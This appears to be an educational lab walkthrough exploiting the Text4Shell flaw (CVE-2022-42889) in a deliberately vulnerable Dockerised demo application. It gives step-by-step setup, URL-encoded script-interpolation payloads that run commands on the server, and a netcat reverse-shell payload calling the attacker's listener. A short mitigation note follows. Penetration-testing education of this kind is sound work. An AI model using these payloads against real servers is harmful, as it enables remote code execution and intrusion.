Exploiting ‘Text4Shell’ vulnerability (CVE-2022–42889)

Summary
This article shows how an attacker could exploit the Text4Shell Vulnerability (CVE-2022–42889). For this purpose we will use U. J. Karthik’s PoC application text4shell-poc.jar.

Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Details
The Text4shell vulnerability was disclosed to Apache on 13th October 2022. Text4Shell is a vulnerability affecting Java products that use certain features of the Apache Commons Text Library, which may allow remote attackers to execute arbitrary code on the server. For more information, see https://www.tarlogic.com/blog/cve-2022-42889-critical-vulnerability-affects-apache-commons-text/#CVE-2022-42889_Key_Features.

Vulnerable applications have the following characteristics:

- Using Apache Commons versions 1.5 to 1.9
- This library is used with sting manipulation

In this PoC, we will use a Dockerized test application “text4shell-poc.jar”. This test application was created by U J Karthik, an ethical hacker / developer from Delhi (https://github.com/karthikuj).

The POC consists of a Linux machine (our victim) and one attacker machine (Kali Linux 2022.3 release).

Victim (installation of text4shell-poc.jar)
— Ubuntu 20.04 (x64)
— IP-Address: 192.168.62.174

Attacker (for reverse shell)
— Kali Linux
— IP-Address: 192.168.62.161

The next sections include:
- Steps 1–3: Install requirements for vulnerable application
- Steps 4–8: Install the vulnerable application
- Steps 9–13: Perform Remote Code Execution on the vulnerable web application
- Steps 14–15 Setup a reverse shell with the attacker machine
- Mitigation
- Credits

Install requirements for vulnerable application

In order to get the vulnerable Java application up and running, we need to install OpenJDK, Maven and Docker.

1. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Install OpenJDK

sudo apt update && sudo apt install openjdk-11-jdk

2. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

We already have docker installed.

which docker

If you don’t have docker:

sudo apt install docker.io containerd runc

3. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Install Maven in /opt

cd /tmp
wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
tar -xvf apache-maven-3.6.3-bin.tar.gz
sudo mv apache-maven-3.6.3 /opt/

Set the environment parameters

M2_HOME='/opt/apache-maven-3.6.3'
PATH="$M2_HOME/bin:$PATH"
export PATH

Install the vulnerable application

4. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Download PoC application

cd /tmp
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git

5. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Use maven to build the application.

cd /tmp/cve-2022-42889-text4shell-docker/
mvn clean install

6. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Build the docker container for the vulnerable application.

docker build --tag=text4shell .

7. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Start the docker image.

docker run -p 80:8080 text4shell

8. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Test the application on the victim machine.

firefox http://localhost/text4shell/attack?search=blablabla

Perform Remote Code Execution on the vulnerable web application

Now, use the attacker machine for further exploitation.

9. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Test the application on our attacker machine.

firefox http://192.168.62.174/text4shell/attack?search=blablabla

10. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Now attack the remote web server by passing a string “${prefix:name}”.

http://192.168.62.174/text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec'touch /tmp/foo’)}

Important: the above string contains: “exec.'touch”. This is not correct, it must be “.exec('touch”. Because of the Medium.com input validation, it was not possible to use “.exec'(touch”. Add the missing "(" manually.

Url encode the above string (https://www.urlencoder.org/).

http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27touch%20%2Ftmp%2Ffoo%27%29%7D

Important: the above string contains: ".exec%27". This is not correct, it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to use “.exec%28%27”. Add the missing “%28“ manually..

This is the correct output.

11. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Get the docker container id

docker container ls

Container ID: 4bc32732e273

12. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Start a bash shell inside the docker container. Use docker exec -it <container_id> bash

docker exec -it 4bc32732e273 bash

13. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Check if the RCE was successful. (You should see a file named foo created in the /tmp directory):

ls /tmp

We have the folder /tmp/foo! RCE successful.

We have a folder called ‘Foo’, RCE was successful.

Setup a reverse shell with the attacker machine

We are lucky to find netcat inside the application docker container. We can use the local netcat version to setup a reverse shell.

14. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Setup a netcat listener.

rlwrap nc -nlvp 443

15. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Construct the payload:

${script:javascript:java.lang.Runtime.getRuntime().exec’nc 192.168.62.161 443 -e /bin/bash’)}

Important: the above string contains: “.exec'nc”. This is not correct, it must be “.exec('nc”. Because of the Medium.com input validation, it was not possible to use “.exec('nc”. Add the missing “(“ manually.

URL encoded the payload

http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27nc%20192.168.62.161%20443%20-e%20%2Fbin%2Fbash%27%29%7D

Important: the above string contains: “.exec%27”. This is not correct, it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to use “.exec%28%27”. Add the missing “%28“ manually

This is the correct output.

Result after navigating to the URL.

Now check our Kali reverse listener.

Reverse shell from the container

Mitigation

Apache has released a patch in the form of a new version of the Commons Text Library version 1.10. Installing this new version mitigates the vulnerability.

Credits

Special credits to U. J. Karthik for this PoC application (https://github.com/karthiku)
Credits to those researchers that discovered this vulnerability and disclosed it first to Apache.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!